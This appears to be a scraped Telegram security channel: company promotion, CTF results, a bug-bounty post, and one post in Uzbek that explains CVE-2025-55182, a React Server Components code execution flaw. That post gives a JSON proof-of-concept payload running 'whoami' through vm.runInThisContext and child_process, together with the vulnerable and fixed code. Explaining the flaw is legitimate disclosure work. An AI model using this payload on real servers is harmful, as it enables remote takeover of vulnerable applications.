JavaSec
144 subscribers
103 photos
15 videos
16 files
40 links
Bu yerda faqatgina cyber security haqida emas, shunchaki Owner o'zining fikri va tajribasini ulashib boradi

About:
Pentester TL @TuranSecurity | Red-teamer (CPTS, CWEE) |CVE 2x Nvidia, 1x Dolibarr | 0day from ZDI | CTF player | Thoughts & life
Download Telegram
Forwarded from Ilhom Sobirov - GAP BOR!
🇷🇺 Сегодня я с гордостью объявляю, что присоединяюсь к совету директоров Turan Security.

Это не просто компания, это кибер-спецназ, играющий в высшей мировой лиге. Факты говорят сами за себя:

🚀 Мировой уровень: Мы в Hall of Fame NASA, Google, Alibaba и Amazon за найденные уязвимости.

Победы и доминирование: Наша команда Flagshare (часть экосистемы TuranSec) вернулась с международной конференции Cyber Kün 2025 в Бишкеке с триумфом: 🥇 1-е место в общем зачете турнира Cyber Ordo.

А также на Cyberkent 3.0 мы заняли: 🥇 1-е место — Blue team (Защита) 🥈 2-е место — Red team (Атака) 🥉 3-е место — CTF MASTER.

🧠 Элитная экспертиза подтверждена сертификатами, которые считаются "золотым стандартом" индустрии: CISSP, OSCP, PNPT, CISM, CEH и еще десятком других (CWEE, BTL1, CRTP, CAP, CAPP, CPTS, BCSP, ACSP, CMPen, CEDP).

🛡️ Национальный кибер-щит: Этой экспертизе доверяют более 30 крупнейших компаний Узбекистана, включая Ipak Yo'li banki, Hamkorbank, Click, Uztelecom, IT Park, O'zbekiston Temir Yo'llari и многие другие.

🇺🇿 Bugun men kiberxavfsizlik bo‘yicha jahon ligasida o‘ynayotgan Turan Security kompaniyasi direktorlar kengashiga qo‘shilganimni faxr bilan e’lon qilaman.

Bu shunchaki kompaniya emas, bu kiber-maxsus otryad. Faktlar gapirsin:

🚀 Jahon darajasi: Alibaba, Google, Amazon va hatto NASA — bizning Bug Bounty ro‘yxatimizda. Jamoa bir necha bor kritik zaifliklarni aniqlagan va ushbu gigantlarning Shon-sharaf zaliga (Hall of Fame) kiritilgan.

🏆 Chempionlar: Jamoamiz yaqinda Cyber Kün 2025 xalqaro turnirida mutlaq 1-o‘rinni egalladi.

Cyberkent 3.0 musobaqasida biz quyidagi o‘rinlar: 🥇 1-o‘rin — Blue team (Himoya) 🥈 2-o‘rin — Red team (Hujum) 🥉 3-o‘rin — CTF MASTER

🧠 Elita: CISSP, OSCP kabi o‘ntalab "oltin standart" sertifikatlariga egamiz.

🛡️ Ishonch: Ipak Yo'li banki, Click, Uztelecom kabi 30+ yirik kompaniya bizning himoyamizda.

Mening missiyam — odamlarga sarmoya kiritish va O‘zbekistonning eng kuchli milliy kiber-qalqonini qurish.

@TuranSecurity | www.turansecurity.uz
1👍64🔥2
Endi osmonimiz ham musaffo emas…
💯9
🚨 CVE-2025-55182 - React Server Components RCE
CVSS Score: 10.0/10 (Maximum xavflilik)

Qaysi versiyalar vulnerable?
React 19.0.0 - 19.2.0
Next.js 15.x va 16.x (App Router)
Server Components ishlatadigan barcha loyihalar


React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:

function requireModule(metadata) {
const moduleExports = require(metadata[0]);
return moduleExports[metadata[2]]; // prototype chain ga kiradi
}


Prototype chain muammosi:
const vm = require('vm');
vm.hasOwnProperty('runInThisContext'); // false
vm['runInThisContext']; // lekin accessible!


Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": {
"id": "vm#runInThisContext",
"bound": ["require('child_process').execSync('whoami').toString()"]
}
}


Server bu request'ni qabul qilgach:
1.vm module'ni load qiladi
2.vm['runInThisContext'] prototype orqali olinadi
3.Attacker'ning code'i argument sifatida bind .bo'ladi
4.Execute bo'lganda vm.runInThisContext() malicious code'ni ishga tushiradi
5.RCE achieved - server butunlay compromised



Fixed code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);

if (!hasOwnProperty.call(moduleExports, metadata[2])) {
throw new Error('Export not found');
}

return moduleExports[metadata[2]];
}
1
Nasib. Yaxshi yangiliklar ham bor…
2🔥84👍2🕊1
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!

Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!

Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.

TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.


Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
1🔥72🤝1
Why mid-January🤔
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥12❤‍🔥3🕊1
JavaSec
Why mid-January🤔
Nvidia also hacked 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🤡3🕊2
frontendni bilmaydigan backendchi bn ishlash qiyin deyishadi
aslida backendchi frontendni emas frontendchini tushunishini o'zi yetadi menimcha bu yerda frontendchi ham o'zi nima hohlayotganini to'g'ri tushuntirib bera olishi ham muhim)
🤣32
3 ta zero-day va uchunchi 0day zaifligi accepted va 👀000💲 bounty!

1-zero-day zaifligi uchun reject olganimda menimcha Zero Day Initiativedan
accepted olishni iloji yoq deb oylagan edim

Zero Day Initiative (ZDI) — Trend Micro tomonidan yuritiladigan, dunyodagi eng yirik va nufuzli vulnerability research dasturlaridan biri. Ushbu dastur mustaqil xavfsizlik tadqiqotchilari (researcherlar) tomonidan topilgan zero-day va kritik zaifliklarni sotib oladi, ularni ishlab chiqaruvchi (vendor) bilan hamkorlikda yopilishini ta’minlaydi va foydalanuvchilar xavfsizligini oshiradi.

Shu dastur orqali topgan zaifligim ZDI laboratoriyasida to‘liq tekshirilib, tasdiqlandi va rasmiy ravishda qabul qilindi. Natijada bounty oldim va ZDI researcher sifatida tan olindim.


Demak iloji bor…
29🔥6👍1🕊1